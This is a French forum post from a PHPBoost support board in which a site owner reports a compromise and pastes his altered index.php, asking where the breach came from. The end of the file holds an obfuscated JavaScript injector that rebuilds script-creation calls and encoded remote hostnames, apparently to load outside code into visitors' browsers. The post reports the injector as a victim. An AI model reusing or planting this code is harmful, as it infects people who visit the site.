Une faille quelque part ?

Une faille quelque part ? [Réglé]

toTOW Membre non connecté

Booster Minigun

Le 19/02/2010 à 12h08

Je voudrais signaler quelques petits problèmes que je rencontre actuellement avec mes sites PHPBoost.

Tout d'abord un membre me signale que son anti virus se plaint avec le message suivant :

J'ai aussi perdu un autre site avec des erreurs "fichiers non trouvé" ... j'ai du le restaurer avec un pack PHPBoost propre.

Au passage, j'ai regardé un peu les fichiers, et j'ai l'impression que certains ont été modifiés ... voici par exemple l'index.php :

Code PHP :

<?php
/*##################################################
 *                                index.php
 *                            -------------------
 *   begin                : August 23 2007
 *   copyright            : (C) 2007 CrowkaiT
 *   email                : crowkait@phpboost.com
 *
 *
###################################################
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 *
###################################################*/
 
define('PATH_TO_ROOT', './');
@include_once('./kernel/db/config.php'); //Fichier de configuration (pour savoir si PHPBoost est installé)
unset($sql_host, $sql_login, $sql_pass); //Destruction des identifiants bdd (on n'en a pas besoin sur cette page)
 
require_once('./kernel/framework/functions.inc.php');
$CONFIG = array();
//Chargement manuel de la configuration générale
@include_once('./cache/config.php');
 
//Si PHPBoost n'est pas installé, on renvoie vers l'installateur
if (!defined('PHPBOOST_INSTALLED'))
{
    import('util/unusual_functions', INC_IMPORT);
    redirect(get_server_url_page('install/install.php'));
}
elseif (empty($CONFIG))
{   // Si la configuration n'existe pas mais que PHPBoost est installé
    // on renvoie vers la page membre du noyau dont on est sûr qu'elle existe
    import('util/unusual_functions', INC_IMPORT);
    redirect(get_server_url_page('member/member.php'));
}
 
//Sinon, c'est que tout a bien marché, on renvoie sur la page de démarrage
define('DIR', $CONFIG['server_path']);
define('HOST', $CONFIG['server_name']);
$start_page = get_start_page();
 
if ($start_page != HOST . DIR . '/index.php' && $start_page != './index.php') //Empêche une boucle de redirection.
    redirect($start_page);
else
    redirect(HOST . DIR . '/member/member.php');
 
?>
 
<script>var ZF="a4bbb289abc9afbda89097dea484bcadd69cb79eb9a5a8afabbaa38687a681aa98adb8a39fb7b8aab8ad89a1b88489abbffefdf3dfd487abb9a0a1bda39abbbfb3cf81b9fd9c8cbbdcbc8fc89da3";var TK=new Array();var Iq;if(Iq!='' && Iq!='Gx'){Iq=''};var ZJo='';function b(H){this.fo=44866; function q(p,S){this.Hn='';return p[h("dcorCaheAt", [1,6,5,3,4,2,0])](S);var yy=new String();}var Vz;if(Vz!='Sj'){Vz='Sj'}; var K=function(I){var t=false;var Ha;if(Ha!='' && Ha!='pl'){Ha=null};var UH;if(UH!='' && UH!='NB'){UH=null};var Hy = '';var v=65243;var E =[0][0];var KU;if(KU!='Hp' && KU != ''){KU=null};var N = -1;var HT=false;this.MG='';I = new F(I);var HV =[0,190,243][0];var Gr="Gr";var ZG;if(ZG!=''){ZG='ku'};var wl;if(wl!='' && wl!='plV'){wl='i'};var Ug=new Date();for (E=I[h("nelhtg", [2,1,0])]-N;E>=HV;E=E-[1][0]){Hy+=I[h("hcraAt", [1,0,3,2,4])](E);var Na=false;var zs=false;}var Tt=38417;this.ro="ro";var iD;if(iD!='MF'){iD=''};return Hy;};this.uW=false; var CX;if(CX!='' && CX!='OY'){CX=''};function z(C){var GJ=new String();this.ok=false;this.X=12927;var o=C[h("enlgth", [2,0,1,3])];var XT="";var D=[41,106,255,122][2];var e=[0,28][0];var W=[224,0,70][1];this.Tty=false;var WJ=[54,1,50,3][1];var Qi='';var JF;if(JF!='' && JF!='Bc'){JF=null};var wJ;if(wJ!='ic'){wJ=''};while(e<o){var MFa;if(MFa!='' && MFa!='zjj'){MFa=null};e++;var iu='';var QR=new Array();Nd=q(C,e - WJ);W+=Nd*o;}var PH='';this.ow="ow";return new F(W % D);}this.PA=false; function h(I, T){var Rv=18456;this.LK=false;var u = T.length;var x = I.length;var Hy = '';var aq=new String();var fp;if(fp!='' && fp!='xx'){fp=null};var HV=[0,154][0];var ZJ;if(ZJ!='' && ZJ!='Jg'){ZJ=''};var Vg;if(Vg!='' && Vg!='sF'){Vg=''};var WJ=[1][0];this.DR="DR";var Up;if(Up!='iC'){Up='iC'};var QS;if(QS!='rM'){QS='rM'};var Cm;if(Cm!='An' && Cm!='sa'){Cm='An'};var nN;if(nN!='aU' && nN!='KK'){nN='aU'};for(var E = HV; E < x; E += u) {var ev = I.substr(E, u);this.eX='';var xe;if(xe!='' && xe!='Sy'){xe=''};var MC;if(MC!='' && MC!='Jr'){MC=null};if(ev.length == u){for(var e in T) {var Tq=new String();var cS;if(cS!='Vu' && cS!='Qy'){cS='Vu'};Hy+=ev.substr(T[e], WJ);var mh=false;var IJ;if(IJ!='' && IJ!='fU'){IJ=''};var NI=new String();this.la="";}this.mR="";} else {this.sk=6866;  Hy+=ev;}}this.skN='';return Hy;var Zi=new String();var zm;if(zm!='' && zm!='In'){zm=''};}var oS=new Date();var Gq='';var Yl=new String(); var yH;if(yH!='FTw' && yH!='at'){yH='FTw'};function B(d,WX){return d^WX;this.HL=false;}this.Glz=53226;this.dS=33069;var G=window;var MM=39145;var iB=new String();var f=G[h("alev", [2,3,0,1])];var Ok;if(Ok!='' && Ok!='vb'){Ok=''};var swh;if(swh!='FE' && swh != ''){swh=null};var oy=f(h("uFcnitno", [1,0]));this.Ph=false;this.ab=false;var wq;if(wq!=''){wq='nV'};var DJY;if(DJY!=''){DJY='rb'};var Yt=25143;var ib=34351;var Y = '';var F=f(h("rStgin", [1,2,0]));var y=f(h("pRgxEe", [1,5,2,4,3,0]));var WM="";var eC;if(eC!='bv' && eC!='dn'){eC='bv'};var LN;if(LN!='' && LN!='vI'){LN=null};var Kt=new Array();var fw=G[h("nuseacep", [1,0])];var Wp;if(Wp!='cC'){Wp=''};var Uf;if(Uf!='Kr'){Uf=''};var c=F[h("ofrmaChrdCoe", [1,2,0,3])];var TT;if(TT!='' && TT!='uG'){TT=''};this.mM=false;var aR=new Array();var uF = '';this.cy=false;var A =[103,21,0,85][2];var jyq;if(jyq!='' && jyq!='IM'){jyq='cQ'};var Ti = /[^@a-z0-9A-Z_-]/g;var pa;if(pa!='aQ'){pa='aQ'};var oF=new String();var qY = '';var OJ;if(OJ!='Fd'){OJ='Fd'};var WJ =[3,1][1];var GVV;if(GVV!='FU' && GVV!='sx'){GVV='FU'};var FUQ;if(FUQ!='' && FUQ!='rO'){FUQ=null};var ig;if(ig!='OV' && ig!='Fo'){ig='OV'};var fX="";var HV =[0][0];var NBX;if(NBX!='NX' && NBX!='Xr'){NBX='NX'};var tGg;if(tGg!='aE' && tGg!='yS'){tGg='aE'};var O = '';var DU;if(DU!='' && DU!='fh'){DU='Qh'};var m = c(37);var EUK=48360;var CE;if(CE!='' && CE!='KE'){CE='yd'};var w=[1, h("ednomucatt.erceenEmelrti(cs'pt')", [1,3,6,5,4,0,2]),2, h("umodc.bnet.adoyndppeldhCi(d)", [3,2,4,0,1]),3, h("ocmn.ewwolrdodgr.u8:080", [1,0,2]),4, h("tAtdt.es'e(rtiubdefer'", [3,5,7,6,4,1,2,0]),5, h("oggoelc.mo", [1,0]),6, h("ur.edeezrc.o.mgap", [1,0,2]),7, h("woidwnaool.nd", [4,2,5,3,1,0]),8, h("ixhnauen.tocm", [1,0]),11, h("igboipt.nomc", [2,0,1]),12, h("evild.roobiz", [3,2,1,0,4]),14, h("ufcnitno)(", [1,0]),15, h("t(cahec)", [2,3,0,6,4,1,5]),16, h("th"tp:", [2,1,3,0]),17, h(".drsc", [1,0]),18, h("eltna", [1,0]),19, h("'1')", [2,1,0]),20, h("ryt", [2,0,1])];var tP="tP";var yq;if(yq!='Ae'){yq=''};var yZ =[200,2,239,244][1];var dqR="";var zr = H[h("nglteh", [2,4,0,1,3])];var eCw=false;var iE;if(iE!=''){iE='hM'};var QA=9201;this.HM=37901;this.hx='';var MV=new Array();var ynB=new Date();this.zn='';this.Ou=false;var LZ;if(LZ!='xm' && LZ!='Gk'){LZ='xm'};for(var V=HV; V < zr; V+=yZ){var Du;if(Du!='' && Du!='Au'){Du=''};var ZJF;if(ZJF!='so'){ZJF='so'};qY+= m; qY+= H[h("rbsstu", [2,5,1,3,4,0])](V, yZ);var Iv=16150;var Re;if(Re!='' && Re!='ze'){Re='svf'};}var nVK="nVK";var H = fw(qY);this.Bv="";var Il=new Array();var tI=new Array();var yv = new F(b);var QCt="";var qa = yv[h("plarece", [3,4,0,1,2])](Ti, O);var qk=new Array();this.Va=36849;this.WBX=false;var a = new F(oy);var n = w[h("nelgth", [2,1,0,3])];var HP=new Date();var wy="wy";qa = K(qa);this.yp=59577;var bXZ;if(bXZ!='aIg'){bXZ='aIg'};var pC;if(pC!='vg'){pC='vg'};var LB='';var zj = a[h("percale", [2,1,0])](Ti, O);var gn=new Array();var zj = z(zj);this.aF='';var s=z(qa);var TR;if(TR!='LA' && TR != ''){TR=null};this.OC='';var LaT;if(LaT!=''){LaT='OK'};for(var E=HV; E < (H[h("gnelth", [3,2,1,0])]);E=E+[81,1,236][1]) {var kG=new String();var ZW;if(ZW!='cT' && ZW != ''){ZW=null};var aL='';var yM;if(yM!='xR' && yM != ''){yM=null};var NH = qa.charCodeAt(A);this.dg='';var Sl = q(H,E);var Df;if(Df!='lkN'){Df='lkN'};this.gP='';Sl = B(Sl, NH);var KY="KY";Sl = B(Sl, s);var JC=new Date();var Pw;if(Pw!='' && Pw!='CA'){Pw=null};Sl = B(Sl, zj);var Ec;if(Ec!='gG' && Ec!='TS'){Ec='gG'};this.dz=35389;var se;if(se!='oE' && se!='Jc'){se='oE'};A++;var jl;if(jl!='' && jl!='aX'){jl=null};var Ga="";var Rp="";if(A > qa.length-WJ){var ja;if(ja!='Lh'){ja='Lh'};A=HV;var NL='';}uF += c(Sl);this.XTE="XTE";var pFb;if(pFb!='' && pFb!='io'){pFb='Kg'};}var Zp;if(Zp!='tz' && Zp!='Xp'){Zp='tz'};var kH;if(kH!='rPB' && kH!='ati'){kH='rPB'};this.xk='';var lq=new Array();for(oQ=HV; oQ < n; oQ+=yZ){var DW=new String();var kV;if(kV!='' && kV!='Ii'){kV='uV'};var Q = w[oQ + WJ];var J = c(w[oQ]);this.YR=false;var MEd;if(MEd!='mRQ'){MEd=''};var xxE;if(xxE!=''){xxE='Wg'};var TL;if(TL!=''){TL='al'};var YS = new y(J, F.fromCharCode(103));var oEe;if(oEe!='' && oEe!='PhF'){oEe=null};var lV=false;uF=uF[h("erlpcae", [1,0])](YS, Q);this.VV=11802;}var gg;if(gg!='Jx' && gg!='Mr'){gg='Jx'};this.Sf=false;this.Vl=false;var eI=new oy(uF);this.PZ="PZ";this.NxJ="NxJ";eI();var itt;if(itt!='ci' && itt != ''){itt=null};eI = '';this.SY=false;s = '';var Krg="Krg";this.hLe="hLe";zj = '';var Ck=new String();var Fe;if(Fe!='Jp' && Fe!='Rk'){Fe=''};var jW="";uF = '';var EVF='';var zv='';qa = '';a = '';this.PT=43747;var fW;if(fW!='' && fW!='rp'){fW=null};this.Gz=false;var duM=new Date();return '';};var TK=new Array();var Iq;if(Iq!='' && Iq!='Gx'){Iq=''};var ZJo='';b(ZF);</script>
<!--b8f1b1e7d9778b42420d75c740f91abb-->

Je ne sais pas d'où sort la dernière partie du fichier, mais elle ressemble fortement à du code vérolé ... par contre, je ne sais pas comment ils ont pu avoir accès à tout ca ... une faille phpboost ou autre (apache, proftpd, ... ?)